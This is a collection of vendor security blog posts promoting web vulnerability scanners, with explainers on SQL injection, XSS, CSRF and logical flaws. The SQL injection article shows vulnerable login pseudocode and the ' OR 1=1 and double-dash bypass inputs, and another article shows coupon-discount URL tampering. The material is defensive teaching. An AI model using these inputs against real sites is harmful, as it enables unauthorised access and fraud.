Despite this significant feature set, it remains affordable to all ogranizations and is well worth looking into. An Enterprise Plus plan also available, offering over 20 targets at a variable price.

  • Hits: 13536

Acunetix v12: More Comprehensive, More Accurate and now 2X Faster Web Vulnerability Scanner

acunetix logo22nd May 2018: Acunetix, the pioneer in automated web application security software, has announced the release of version 12. This new version provides support for JavaScript ES7 to better analyse sites which rely heavily on JavaScript such as SPAs. This coupled with a new AcuSensor for Java web applications, sets Acunetix ahead of the curve in its ability to comprehensively and accurately scan all types of websites. With v12 also comes a brand new scanning engine, re-engineered and re-written from the ground up, making Acunetix the fastest scanning engine in the industry.

“Acunetix was always in the forefront when it came to accuracy and speed, however now with the re-engineered scanning engine and sensors that support the latest JavaScript and Java technologies, we are seeing websites scanned up to 2x faster without any compromise on accuracy.” announced Nicholas Sciberras, CTO.

A free trial version can be downloaded from: http://www.acunetix.com/vulnerability-scanner/download/

Support For Latest JavaScript

acunetix v12 introAcunetix DeepScan and the Acunetix Login Sequence Recorder have been updated to support ECMAScript version 6 (ES6) and ECMAScript version 7 (ES7). This allows Acunetix to better analyse JavaScript-rich sites which make use of the latest JavaScript features. The modularity of the new Acunetix architecture also makes it much easier now for the technology to stay ahead of the industry curve.

AcuSensor For Java

Acunetix version 12 includes a new AcuSensor for Java web applications. This improves the coverage of the web site and the detection of web vulnerabilities, decreases false positives and provides more information on the vulnerabilities identified. While already supporting PHP and ASP .NET, the introduction of Java support in AcuSensor means that Acunetix coverage for interactive gray box scanning of web applications is now possibly the widest in the industry.

acunetix web vulnerability scanner v12 AcuSensor for Java

Speed & Efficiency With Multi-Engine

Combining the fastest scanning engine with the ability to scan multiple sites at a time, in a multi-engine environment, allows users to scan thousands of sites in the least time possible. The Acunetix Multi-engine setup is suitable for Enterprise customers who need to scan more than 10 websites or web applications at the same time. This can be achieved by installing one Main Installation and multiple Scanning Engines, all managed from a central console.

Pause / Resume Feature

Acunetix Version 12 allows the user to pause a Scan and Resume the scan at a later stage. Acunetix will proceed with the scan from where it had left off. There is no need to save any scan state files or similiar - the information about the paused scan is automatically retained in Acunetix.

acunetix web vulnerability scanner paused scan

About Acunetix

User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry leading crawler fully supports HTML5 and JavaScript and AJAX-heavy websites, allowing auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on premise solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality.

Acunetix, The Company

Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe  and many more.

  • Hits: 9588

Everything You Need to Know About SQL Injection Attacks & Types, SQLi Code Example, Variations, Vulnerabilities & More

sql injection introSQL Injection Attacks are one of the most popular attacks against web servers, websites and web applications. A fairly popular website can expect to receive anywhere between 80 and 250 SQL injection attacks on a daily basis and these figures can easily reach thousands when an SQL vulnerability is disclosed to the public.

This article aims to help network engineers, administrators, security experts and IT professionals understand what an SQL injection is by taking you step-by-step on how an HTTP SQL injection attack is executed using real code. 

Here is a list of topics we’ll cover:

Additional related articles:

SQL Injection Attacks - Basics

SQL Injection, or SQLi for short, refers to an attack vector that exploits a web application by abusing the inherent trust between the web application and the database. An SQL injection attack would allow an attacker to perform malicious actions on the database through the use of specially crafted SQL commands. SQL is the most commonly used database query language, making it ideal for an attacker to target.

Since SQL Injection attacks can be performed against a wide array of applications, this attack is one of the most widely common and most critical of web vulnerabilities. So much so that injection attacks, such as SQL Injection, have placed first in OWASP’s Top 10 list,  several times in a row.

SQL Injection attacks can allow an attacker to extract, modify, add and delete data from a database, in turn affecting data confidentiality, integrity and availability (since an attacker could potentially delete data and disrupt operations). In addition, an SQL Injection attack can be used as a springboard to escalate the attack.

Example of an SQL Injection Vulnerability

example of sql injectionA web application would typically communicate with a variety of back-end systems, including a database. Let’s take an HTML form, which inserts values into a database, as an example. 

Once the form is filled out and submitted, an HTTP request (usually a POST request) is sent to the web application, where the input values are directly included into the SQL statement that will insert these values into the database

The only way an SQL Injection vulnerability could occur is if the web application trusts the user’s input without parameterizing it and using prepared statements. This is done by instructing the database that a certain part of the query should be executed while the rest is to be treated as the user’s input. 

Prepared statements ensure that the database does not interpret certain characters in the user’s input as part of the SQL statement, therefore allowing the attacker to submit their own SQL statements.

SQL Injection example: The following pseudo code is a simple example showing how a user can be authenticated:

// Get username and password from POST request
username = request.post['username']
password = request.post['password']

// Statement vulnerable to SQL injection
sql = “SELECT id FROM users WHERE username=’” + username + “’ AND password=’” + password + “’”

// SQL statement executed by database
db.exec(sql)

If the user inputs foo as the username and bar as the password, the following SQL statement will be processed by the database server:

SELECT id FROM users WHERE username=’foo’ AND password=’bar’

When executed, as expected, this will return the value of the ID column that is associated with the database entry of the corresponding username and password.

Exploiting SQL Injection Vulnerabilities 

The example above is vulnerable to SQL Injection, since whatever the user inputs in the form will be interpreted by the database server as a command. For instance, an attacker could bypass this form by setting the password field to ’ OR 1=1

The following is what the SQL statement would look like.

SELECT id FROM users WHERE username=’foo’ AND password=’pass’ OR 1=1

From the above statement we can see that the user’s input has changed the statement’s functionality. Now, the value of the ID column is being returned if the submitted username is equal to foo, and password is equal to pass, or if 1is equal to 1 (which will always be the case).

With this statement only the username needs to match the value in the database because, for the password condition to be met, the submitted password can either match the value in the database or it can be validated if 1=1. With this trick, the attacker can bypass the website’s authentication mechanism for any user whose username is known

To further control the SQL statement, an attacker can even comment out the rest of the statement. For example, an attacker can use the double-dash (--) notation to comment out the rest of the statement:

SELECT id FROM users WHERE username=’username’ --’ AND password=’bar’

The highlighted part of the above statement, or anything after the double-dash, will be commented out and therefore not considered during execution. This will once again allow an attacker to bypass authentication

Variations of SQL Injection Attacks

It is important to note that there are three major classifications of SQL Injection attacks, each of which has its own particular use and can only be used under a specific circumstance. These categories are:

In-Band SQL Injection

The example that we saw earlier was an in-band attack since the same channel was used to launch the attack and obtain the result which, in this case, was being authenticated. In-band attacks are the most common and easiest to exploit in comparison to other SQL injection attacks. 

Data exfiltration using in-band attacks can either be done through error messages that are reported on the web application triggered by an SQL Injection attack or by using the UNION operator thereby allowing an attacker to insert their own SQL statements. 

Blind SQL Injection

Blind or Inferential SQL Injection attacks may take longer to execute, since the only response returned is in the form of a boolean. The attacker can exploit this to make requests and identify differences in the response being returned, which will confirm if the requests sent had a true or false result and then reconstruct the database structure and data.

Content based attacks focus on the response being returned, such as an HTTP response status code or the response data itself. On the other hand, time based attacks measure delays in the response being sent by the server where, for example, a ten second delay may confirm that the request returned a true result, while no delay means that the result was false. 

Out-of-Band SQL Injection

Out-of-Band attacks are the least common of the SQLi attacks and generally the most difficult to execute because the attack requires that the server hosting the database will communicate with the attacker’s infrastructure. This attack would normally be used if the channel through which the requests are being made is not consistent or stable enough for an in-band or blind SQLi attack to succeed. 

Summary

SQL Injection attacks require that the web application passes an attacker’s input to the database without making use of prepared SQL statements. Exploiting an SQL Injection vulnerability can, potentially, even allow an attacker to gain access to resources that are only reachable on local networks.

Since SQL Injection has been around since 1998 it is widely understood and easily exploitable using free and readily available tools. Most development frameworks have protection mechanisms built in that assist web developers to produce web applications that are not prone to SQL Injection attacks.

This goes to show that preventing SQL Injection vulnerabilities has become a necessity. Manually testing each form and parameter does not work well, which is why it makes sense to automate web application security testing with a tool such as Acunetix, which will not only find instances of SQL Injection but also other known vulnerabilities.

  • Hits: 23608

Acunetix Online: Run a Free Scan for Network and Web Vulnerabilities. Detect, Prioritise and Manage Security Threats

Acunetix Free Online Network and Web Vulnerability ScannerAcunetix has refreshed its online web and network vulnerability scanner, Acunetix Online, with a massive update. The new Acunetix Online now incorporates all the features found in its on premise offering, Acunetix On Premise. With a brand new simpler than ever user interface, integrated vulnerability management and integration with popular Web Application Firewalls (WAFs) and Issue Tracking systems, this is by far the biggest Acunetix Online release since it’s introduction.

Simpler, Cleaner User Interface

Acunetix Online’s new user interface has been re-designed from the ground-up to bring it inline with Acunetix On Premise. The Acunetix Online user interface has been simplified whilst being made more useful by focusing on the product’s core functionality by introducing filtering options, and improving manageability of Targets. Features include:

  • Targets, Scans, Vulnerabilities and Reports can all be filtered to find exactly what you are looking for quickly.
  • Excluded Hours, Excluded Paths, custom User Agent strings, client certificates and many more configuration options previously only available to Acunetix On Premise customers are now also available in Acunetix Online.
  • Test complex web applications by pre-seeding crawls using a list of URLs, Acunetix Sniffer Log, Fiddler SAZ files, Burp Suite saved and state files, and HTTP Archive (HAR) files.
  • Vulnerabilities across all Targets are displayed in one view.
  • Vulnerabilities can be filtered by Target, Business Criticality, Vulnerability, Vulnerability Status and CVSS score.
  • Vulnerability can be grouped by Target Business Criticality and Vulnerability Severity.

Acunetix Online Dashboard - manage and track security vulnerabilities

The enhanced Acunetix Online Dashboard provides all necessary information in one place to help manage and track security vulnerabilities

Easier, more effective Target and Vulnerability management

Business Criticality, a user-defined metric to determine how important a Target is to the business’ function, can now be assigned to Targets. This enables you to easily prioritize vulnerability remediation based on business criticality.

Out-of-the-box Issue Tracker and WAF integration simplifies vulnerability remediation

Acunetix Online now supports one-click issue creation in Atlassian JIRA, GitHub and Microsoft Team Foundation Server (TFS), allowing development teams to better keep track of vulnerabilities in their issue tracking systems -- All without leaving the Acunetix Online interface!

Vulnerabilities can now be exported to WAFs (F5 Big-IP ASM, Fortinet FortiWeb and Imperva SecureSphere), allowing users to implement virtual patches to critical vulnerabilities in the WAF, until a fix addressing the vulnerability is deployed to the web application. Scan results can now also be exported to the Acunetix generic XML for integration with other WAFs or 3rd party systems.

Mark Vulnerabilities As Fixed Or False Positives

Acunetix Online not provides the ability to mark vulnerabilities as False Positive, Fixed or Ignored. This means that users can now get rid of false positives from upcoming scans and reports.

To make vulnerability management more useful, Acunetix Online will now label reoccurring vulnerabilities as Rediscovered. You may choose to accept a vulnerability’s risk by marking the vulnerability as Ignored.

Custom Scan Types

Scan Types are a logical grouping of tests that test for specific classes of vulnerabilities. Of course, Acunetix Online comes bundled with commonly used default Scan Types, however, Acunetix Online now even create your own Scan Types. A great example of a Custom Scan Type is to scan Targets for a recently discovered vulnerability.

Enhanced Reporting

In addition to generating reports for an individual scan, Acunetix Online now allows you to generate reports on:

  • Individual or multiple Scans
  • Individual or multiple Targets
  • Individual, multiple or all the Vulnerabilities identified by Acunetix.

There is also the introduction of a Scan Comparison report which highlights the differences between 2 scans, allowing the user to easily identify the new vulnerabilities in the latest scans, or the vulnerabilities that have not been detected, which could mean that they are fixed. Reports are now available in both PDF and HTML.

Network Security Scanning

Acunetix Online provides a comprehensive perimeter network security scanning service by integrating with the latest OpenVAS network vulnerability scanning engine (v9). This means that Acunetix Online can now detect in excess of 50,000 perimeter network vulnerabilities.

Added Functionality For Acunetix Integrators

Acunetix Online now also has a new powerful RESTful API that may be used by system integrators. The API is able to provide up-to-the-minute status of on-going scans together with information on vulnerabilities identified for these scans.

 

  • Hits: 15302

Protecting Your Cookies from Cross Site Scripting (XSS) Vulnerabilities – How XSS Works

Understanding XSS Vulnerability Attacks

protecting cookies from xss vulnerabilitiesThis article aims to help you understand how Cross Site Scripting (XSS) attacks work. Cross Site Scripting or XSS can happen in many ways. For example, an attacker may present you with a malicious website looking like its original and ask you to fill in your credentials. When your browser sends its cookies over to the malicious website, the attacker decodes your information and uses it to impersonate you at the original site. This is a targeted attack and is called non-persistent in technical terms.

Websites and web applications usually send a cookie to identify a user after he/she has logged in. For every action from the user on the site, the user's browser has to resend the cookie to the web application as identification. If an attacker is able to inject a Cross-site Scripting (XSS) payload on the web application, the malicious script could steal the user's cookie and send it to the attacker. The attacker can then use the cookie to impersonate the user in the web application. The most dangerous variation of XSS is persistent, or stored XSS. This is because the attacker’s XSS payload gets stored and served to each visitor accessing the website or web application without any user interaction.

By stealing a session cookie, an attacker can get full control over the user's web application session.

What Happens During An XSS Attack?

Although Cross-site Scripting (XSS) is one of the most common forms of attacks, most people underestimate its power to exploit. In an XSS attack, the attacker targets the scripts executed on the client-side rather than on the server-side. Mostly it is the internet security vulnerabilities of the client-side, because of JavaScript and HTML, which are the major victims for these kinds of exploits.

In an XSS attack, the attacker manipulates the client-side scripts of the web application of the user to execute in a certain manner suitable to the attacker. With such a manipulation, the attacker can embed a script within a page such that it executes each time the page is loaded or whenever a certain associated event is performed.

Basic XSS attack. How malicious scripts are injected into web servers & victims browsers

Basic XSS attack. How malicious scripts are injected into web servers & victims browsers

In another variation of the XSS attack, the attacker has infected a legitimate web page with a malicious client-side script. When the user opens the web page in his browser, the script downloads and, from then on, executes whenever the user opens that specific page.

As an example of an XSS attack, a malicious user injects their script into a legitimate shopping site URL. This URL redirects a genuine user to an identical but fake site. The page on the fake site runs a script to capture the cookie of the genuine user who has landed on the page. Using the cookie the malicious user now hijacks the genuine user's session.

Most site owners do not view XSS attacks as serious enough to steal sensitive data from back-end databases, however, the consequences of an XSS attack against a web application can be quite serious and both application functionality and business operation may be seriously compromised.

If an enterprise's site is vulnerable to XSS exploits, present and future customers may not want to continue to do business with it fearing leakage of sensitive information. The loss of trust will definitely not auger well for the future of the enterprise. It might also lead to a defaced application and a public embarrassment for the enterprise, much to the relish of the attacker.

Exploitation through XSS may lead to the following:

  • Theft of identity;
  • Accessing of restricted or sensitive information;
  • Free access to otherwise paid-for content;
  • Spying on the habits of the user;
  • Changing the functionality of the browser;
  • Public defamation of an enterprise or an individual;
  • Defacement of a web application;
  • Denial of Service to genuine users.

In several cases of XSS attacks, malicious attackers have made use of security flaws in high-profile web sites and obtained user information and credit card details to carry out expensive transactions. They have tricked legitimate users into visiting a malicious but legitimate looking page that captured the user’s credentials and sent the details to the attacker.

Although the above incidents may not be as bad as that of attackers gaining access to an enterprise database, customers can easily lose faith in the application's security. For the owner of the vulnerable website, such incidents can turn into legal hassles, liabilities, and loss of business.

Protecting Your Cookies From XSS Vulnerabilities

There is not much one can do for a targeted attack or a non-persistent attack where the user has delivered his/her credentials to the attacker. However, web application scan use automated tools to check whether they are vulnerable to Cross-site Scripting.

The complex nature of web applications in present use makes it difficult to identify and check all attack surfaces manually against XSS attack variants, because the variants can take multiple forms. Therefore, automated web application security scanners are preferable as they can crawl the website automatically and check for any vulnerability to cross-site scripting. They detect and indicate the existing vulnerability of the URL and input parameters on the script of the website, which the owner of the website must then fix.

  • Hits: 34410

Understanding, Avoiding & Protecting Against Cross Site Request Forgery Attacks

This article explains what a web browser cookie is and examines how Cross Site Request Forgery work by allowing hackers to intercept and access web browser cookies from unaware users trying to logon to a website to continue their online shopping or access personal online files e.g Dropbox etc. We also explain how we can avoid Cross Site Request Forgery attacks and best security practices to keep our web applications and users safer.

What is a Cookie?

When visiting a website, a cookie (small file) from the website is usually stored on your computer containing information such as login details, items you had in your shopping basket etc. Each cookie is unique to your web browser and website visited, so that the website can retrieve or read the contents of its cookie when revisiting it. What most people are unaware of is that any malicious attacker with access to your computer can use the cookies stored therein to exploit access to websites you have visited earlier.

A malicious attacker may take advantage of this situation by latching on to the authentication cookie the user is sending to the website for initiating an action and then using the credentials to impersonate the user. The attacker uses Cross Site Request Forgery (CSRF) for initiating the attack.

Mechanism of a CSRF Attack

The Open Web Application Security Project (OWASP) Top 10 lists Cross Site Request Forgery which is an attack whereby an attacker uses his or her website to send malicious code to a vulnerable web application in which a user is already authenticated.

Illustration of how CSRF attacks workFigure 1. Illustration of how CSRF attacks work

When the user visits the attacker’s website, the malicious code inadvertently forces the user’s browser to generate an unwanted request to the intended web application, thereby also making it send an authentication cookie. That allows the attacker to gain access to the functionality of the target web application just as the user would. Targets include web interface for network devices, in-browser email clients, and web applications such as social media sites.

Examples of CSRF attacks include the attacker transferring unauthorized money from victims’ bank accounts, sending out offensive postings on social media sites by impersonating you, and snooping on all your Internet traffic by redirecting your router (analyzed below). The attacker does all this from a site different from the vulnerable site, hence the name Cross Site.

Executing A CSRF Attack

Assume you have recently purchased a home wireless router and are trying to configure it via its web interface. As with the most routers, it has a commonly used internal IP address of 192.168.1.1. Since it is difficult to configure, you seek help from a website that has published a guide that shows the necessary buttons to click on the router interface to get everything set up securely.

The website guide actually belongs to attackers and they have a CSRF attack set up in the tutorial. They know that when clicking through their guide, you are also logged in to your router, following their instructions. The CSRF attack reconfigures your router without your knowledge so that all internet traffic would be routed to a proxy server they have set up on the internet, allowing them to monitor your internet activity.

Preventing CSRF Vulnerabilities

To prevent CSRF vulnerabilities, it must be clear the vulnerability actually lies in the affected web application and not in the victim’s browser or the site hosting the CSRF. Therefore, web applications need countermeasures to raise the bar for making CSRF more difficult to perform.

  1. As CSRF relies on HTTP requests that produce side effects such as deletions or data modifications with the use of HTTP POST. However a HTTP POST alone may not suffice, as even after the page is loaded, an attacker can create a phantom POST request by using JavaScript. Additional safeguards are necessary to avoid CSRF for POST requests:
  2. Check the HTTP Referrer header to verify that the request originated from the web browser the user is using and not from a malicious user agent. Of course, it is also possible for someone to inject HTML/JavaScript code into your page to originate the request. An alternative is to add an original header to the HTTP packet and send it only after the POST request with only a hostname, to ensure privacy.
  3. Use one-time tokens. This is a popular method used by banks. The token is generated from a small electronic device for a single session of the user and included in each transmission. Forms contain a field that is populated by the token similar to the one shown below:

    security tokens used for e banking

    Figure 2. Security tokens used for e-banking

  4. Use a double-submitted cookie. This is an advanced variation of the one-time token, where the token coming with the form is matched with a cookie, instead of the session value.
  5. Use a web application security scanner: you can also use an automated web application security scanner to automatically detect CSRF vulnerabilities in web applications. If you use Netsparker Desktop you do not need to disable the one-time token anti-CSRF technology to automatically scan your website.

Although the above suggestions will reduce the risk dramatically, they are no match for advanced CSRF attacks. Using unique tokens and eliminating all XSS vulnerabilities in web applications are still the strongest techniques against such CSRF attacks.

  • Hits: 13043

Differences between Network & Web Application Security. Comparing Network Security with Web Security

network security vs web security According to Wikipedia, security is defined as the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset which in almost all cases, will include an organizations’ website, web service and IT infrastructure.

At the same time, it is important to realize that security is a very broad term. Many people mistakenly associate network security with web application security. While there are some similarities, there are also many distinct differences that necessitate a unique approach to each. The assumption that a secure network results in a secure web application and vice versa is a critical mistake.

In this article, we are going to look at what makes web application security different from network security and why an approach that addresses both is the only way forward when it comes to maintaining an effective overall IT security posture.

What Is Network Security?

Network security can be either hardware based (routers with a built-in firewalls, network intrusion and detection systems) or software based. Because network security has been around for a very long time, it’s often the first thing that comes to mind when people think about security. Web application security on the other hand, is a relatively new challenge.

Much like a moat, curtain wall and portcullis protect a castle, network security plays the important but restrictive and limited role of keeping the bad guys (hackers) out and allowing the “good guys” to enter. In the DMZ environment there’s an overall focus on protecting the perimeter that surrounds the website, web application or web service with the help of a Firewall security appliance. Although this works well in some instances, Firewall security appliances are no longer considered an adequate solution because they are unable to protect organizations from their own vulnerable web services or web application servers.

Even in the event of an Intrusion Prevention System (IPS), new application-based exploits or incorrectly secured web applications are almost impossible to detect as IPS systems are signature-based which means they need to know about a specific exploit or attack in order to help protect against it.

Let’s examine two very common scenarios based in the organization’s DMZ environment which is where most internet originating attacks focus on:

First, when is network security considered effective? As an example, an FTP server might have a network security setting that limit access to it for a specific remote user. This effectively controls who is able to access the server, however we must keep in mind that the FTP server is responsible of filtering all requests from non-allowed users.

Second, if you have a high-traffic website or web application open to the public, ports 80 (HTTP) or/and port 443 (HTTPs) are usually required to be open,allowing valid and malicious traffic access the resource. The only way to effectively address this issue is through web application security to eliminate all potential web application vulnerabilities. Our article covering popular websites that have been repeatedly comprimised is direct proof of such real-life examples.

Web Application Security

Consumers’ need for applications that provide more information and increased functionality has organizations creating increasingly complicated web applications. As a result, the attack surface of many web application is rarely static. It’s either increasing in size or becoming more complicated. The process of managing web application security is a challenging one that is continuously becoming more time-consuming and demanding as applications continue to become more complex.

There are two distinct aspects that make web application security such a challenge:

  1. The organization’s network infrastructure provides access to the web application, by default, it exposes all potential vulnerabilities to attack including web forms, input fields, logical web vulnerabilities and more. The only realistic solution is to work towards the elimination of all vulnerabilities.
  2. The second problem is that from a network perspective it is very difficult to differentiate hackers from legitimate traffic, even with the help of a sophisticated firewall security appliance

The problem is further complicated by the fact that many malicious activities including the exploitation of vulnerabilities such as SQL Injection and DOM based Cross-Site Scripting vulnerabilities present themselves as regular traffic passing through port 80 or 443. Therefore the only way to resolve this problem is to place a greater emphasis on eliminating all web application vulnerabilities.

Summary

Every organization will have an individualized approach to security. The ideal approach takes into account both networks and web applications. Historically, a greater emphasis has been placed on network security, and this is an approach that has worked well.

However, as the trend towards depending more on increasingly complicated web applications and improved access to information continues, it has become critically important to manage all aspects of security — reducing overall risk to the greatest extent possible.

Obviously, this involves monitoring and controlling network traffic but it also includes the adoption of secure coding practices, scanning web applications for all potential vulnerabilities and using manual penetration testers who are experienced enough to identify and test for logical vulnerabilities.

  • Hits: 27356

Scan and Generate Firewall Rules to Secure your Website and WebServer with ModSecurity. Block Exploits & Vulnerability Attacks

ModSecurity is a very popular open-source web application Firewall used to protect webservers and websites from vulnerability attacks, exploits, unauthorized access and much more. In this article, we’ll show you how web vulnerability scanners, can be used to automatically generate the necessary rules that block all vulnerabilities identified during the scan.

This great feature of automatically generating ModSecurity rules for identified vulnerabilities through a web vulerability scanner, giving all users the ability to now create and deploy ModSecurity rules immediately – saving valuable time and accelerating the whole scan-&-patching process considerably. Generating ModSecurity Rules from a Web Application Vulnerability ScannerFigure 1. Generating ModSecurity Rules from a Web Application Vulnerability Scanner

ModSecurity is used by many vendors and webservice providers as it is capable of delivering a number of security services including:

  • Full HTTP traffic logging. ModSecurity gives you the ability to log anything you need, including raw transaction data, which is essential for forensics analysis and in-depth tracing.
  • Web Application Hardening. Helps fix cross-site request forgery vulnerabilities and enforce security policies with other Apache modules.
  • Real-time application security monitoring. ModSecurity provides full access to the HTTP traffic stream along with the ability to inspect and action against attacks.
  • Becomes a powerful exploit prevention tool when paired with web server and web application vulnerability scanners such as Netsparker.

Most Web Application Vulnerability Scanner vendors provide full details on how to use their web application scanner to successfully generate ModSecurity rules that will help identify and block existing vulnerabilities in web applications and web servers.

  • Hits: 13278

Web Application Vulnerabilities – Benefits of Automated Tools & Penetration Testers

Web Application Vulnerabilities – Benefits of Automated Tools & Penetration TestersThis article examines the differences between logical and technical web application vulnerabilities which tends to be a very confusing topic especially for web application developers and securitypenetration experts because it would make sense that a vulnerability by any other name is simply confusing something that should be simple.

However, there are significant differences between technical and logical vulnerabilities which are critically important — especially if you are developing or penetration testing a web application.

Automated web application security scanners are indispensable when it comes to scanning for potential vulnerabilities. Web applications today have become complicated the point where trying to eliminate all vulnerabilities manually is nothing short of foolish. The task is too large to even attempt. And, even if you did, you are likely to miss far too many as a result of human error.

Don’t let that lead you to believe that humans have no place in the process. While computers are indispensable in their ability to tirelessly scan for technical vulnerabilities, humans have the unique ability to not only think logically, but also analytically.

As a result, we still play a critical role in the process of identifying vulnerabilities in websites and web applications and will likely do so for some time to come.

But what is the difference between logical and technical vulnerabilities? And where should humans intervene in the detection process? To understand this, let’s take a closer look at the difference between the two.

Technical Vulnerabilities

web-vulnerability-scanning-using-automated-tools-and-penetration-testers-2Technical vulnerabilities is an area where automated scanners excel — it is a rule-based process. It is also time intensive, because of the vast number of attack vectors and potential vulnerabilities. For a human to complete this process, while possible, would be extremely expensive and likely full of both false-positives and false-negatives.

A common example of a technical vulnerability (for example SQL Injection) would be an application that requires information to be submitted by a user through a form. Any data submitted needs to be properly sanitized and failure to do so could make your application vulnerable to attack.

Testing for this is a simple task. For example, a hacker could probe for a vulnerability by submitting an email address with a single quotation at the end of the text. The response they receive might indicate the presence of a vulnerability.

Now, imagine your web application has 300 potential inputs. Without automation, the process would be time-consuming for both the hacker and the penetration tester. Luckily, the test and the potential result are predictable and repeatable. This makes testing for vulnerabilities like this relatively easy for an automated scanner. Speed and consistency are important in the testing process because it only takes one vulnerability to cause a problem.

Logical Vulnerabilities

Logical Vulnerabilities - Web Application Penetration TestingLogical vulnerabilities are much harder to detect primarily because they require a human to think about and assess a potential problem. While it’s true that some logical vulnerabilities can be programmed, it’s often cost-prohibitive to do so.

The ability to detect logical vulnerabilities can also be highly dependent upon experience. For example, consider a burglar trying to break into your house.

If the burglar only operated from a technical perspective, they might try to open each door and window in your house and come to the conclusion that it’s either locked or unlocked. If it’s locked, they would move on and try the next one. If it’s unlocked they would realize that a vulnerability is present.

On the other hand, if the burglar operated from a logical perspective and was experienced, they might look at your window and realize that it’s 25 years old. As a result of experience, they might realize that your locking mechanism could be worn out. By simply tilting the window in the right fashion, the lock might pop out of place and the window would open.

This is the kind of logical vulnerability that requires a human to expose it. Now, let's imagine you’re running an eCommerce store. You offer a 40% bulk discount for anyone who purchases 10 or more of a single item. Your web application creates a URL that looks like this when someone places a qualifying order:

/checkout/cart/couponPost?product=712&qty=10&coupon_discount=40

Now, imagine if someone came along and decided that they wanted the same 40% discount even if they only bought one item. They might try to use the following URL:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=40

Would the above URL enable them to bypass your quantity requirement? What about this one:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=90

Would this URL allow them to purchase a single item with a 90% discount?

These are just some basic examples of logical vulnerabilities that require input from a human. They also demonstrate the importance of using a security professional who is familiar with your industry and your application. That means hiring someone who has the right kind of experience and who can ask the right questions.

The good news about logical vulnerabilities is that, as a general rule, they are more difficult to find. Not only does a hacker require more skill to find them, but they also can’t use automated tools as easily.

The best real-world description of a logical vulnerability is when an attacker causes your web application to execute or to do something that was not intended to happen — as in the example above where someone was able to generate a discount that they should not have been entitled to.

The Importance Of Assessing Technical & Logical Vulnerabilities

In order to properly assess a web application for vulnerabilities, it is critical to consider both technical and logical. Automated tools are invaluable when it comes to efficiency and reliability. They are thorough, tireless and, when setup properly, very reliable.

But that does not mean human input can be removed from the process. When it comes to assessing a situation from a logical and analytical perspective and considering potential outcomes, the human mind wins the battle every time.

Hopefully, this post makes clear the importance of using both automated tools and live penetration testers. Neither is 100% reliable but, when used in conjunction with one another, they provide a solution that is both cost-effective and reliable. Read more about web application vulnerabilities and testing methods by visiting our Web Application security scanner section.

  • Hits: 10563

Top 3 Most Popular Web Application Vulnerabilities - Security Scans of 396 Open Source Web Applications

Since 2011 Web Application Vulnerability scanners scanned 396 open source web applications. The scanners identified 269 vulnerabilities and a popular web vulnerability scanner published 114 advisories about the 0-day ones. 32 of the advisories include details about multiple vulnerabilities. According to the statistics above, around 30% of the open source web applications we scanned had some sort of direct impact vulnerability.

most-popular-web-application-vulnerabilities-1

Out of the 269 vulnerabilities a specific scanner detected the web vulnerability scanners identified:

  • 180 were Cross-site Scripting vulnerabilities. These include reflected, stored, DOM Based XSS and XSS via RFI.
  • 55 were SQL Injection vulnerabilities. These also include the Boolean and Blind (Time Based) SQL Injections.
  • 16 were File Inclusion vulnerabilities, including both remote and local file inclusions.

The rest of the vulnerability types are CSRF, Remote Command Execution, Command Injection, Open Redirection, HTTP Header Injection (web server software issue) and Frame injection.

  • Hits: 10244

Automate Web Application Security - Why, How & The Necessary Tools

automate-web-security-how-why-security-tools-1In this article, we’re going to talk about automating your web security in the safest and most effective way. We’ll also touch on a few Web Application Security automation tools worth considering using. Furthermore, we'll speak about why its important to select the right Web Application Scanning tool and how it can help meet your web development time frame, saving the company a lot of money and time.

Automation has been a popular buzzword in the digital space for a few years now. With the ability to reduce labour hours, eliminate repetitive tasks and improve the bottom line, it seems that everyone is looking for a way to automate their daily workflow to every extent possible. With web application security testing being both time-consuming and expensive, it’s a prime candidate for automation.

In the never-ending game of cat and mouse between developers, penetration testers and hackers The speed of execution plays a significant role in the identification and management of vulnerabilities. What makes the process even more challenging is the fact that both security professional and hackers are using the same or similar tools.

If you’re not taking advantage of the ability to automate some of your security scanning, it’s only a matter of time until someone beats you to the punch. In almost all situations, it’s not a risk worth taking.

Despite all the positive aspects that arrive as a result of using an automated web security scanner, there are still some important points to consider during the implementation process in order to maximize your effectiveness.

Automation Starts With Planning

As with any undertaking, in order to achieve optimal results, it’s imperative that you follow a well thought out planning process. This means before you commence automated web vulnerability scanning, you should develop a plan that is specific, measurable, attainable and time-sensitive.

Reducing risk and searching for web application vulnerabilities requires nothing short of a detailed plan. You need to understand what a potential hacker might be looking for and where the most serious risks might lie, area that will vary with every business. You also need a clear understanding of what tools you’ll be using as well as how they will be used.

Automating web security means having a plan that is measurable. This is best achieved through accurate reporting and open communication amongst your team. If a web application is in development, you should be testing at specific predetermined intervals throughout the development lifecycle. Writing vulnerable code on top of vulnerable code merely exacerbates the problem.

A plan that’s attainable will help to keep you on track. Consistent and methodical testing is always better than inconsistent and haphazard.

Finally, having a time-sensitive completion date is always vital to the overall success. If your project never leaves the development and testing phase, is still a liability from a business perspective, which is why many developers turn to automatic scanning tools from both the open-source and commercial sector

Automated Versus Manual Scanning

automate-web-security-how-why-security-tools-2You might be asking, “how can an automated web vulnerability scanner possibly replace a human?” You’d be correct in your assumption that an automated scanner is no replacement for human intuition or experience. However, you’d probably also agree that manually scanning for hundreds or thousands of cross-site scripting (XSS) vulnerabilities across multiple web applications can quickly become an unrealistic proposition.

One of the keys to automating your web security is finding the appropriate timing and balance between using an automated scanner and a security professional. Intuition and experience are razor sharp at 7 AM, but their effectiveness and reliability have decreased significantly by 4 PM.

Use a human element where necessary and automate everywhere else. We discussed this recently when comparing technical and logical vulnerabilities, and it’s clear that while many of the vulnerabilities listed in the OWASP top 10 require human logic, there are many that do not – efficient allocation of human resources has financial benefits and can also improve the effectiveness of logical analysis.

Choose Your Tools

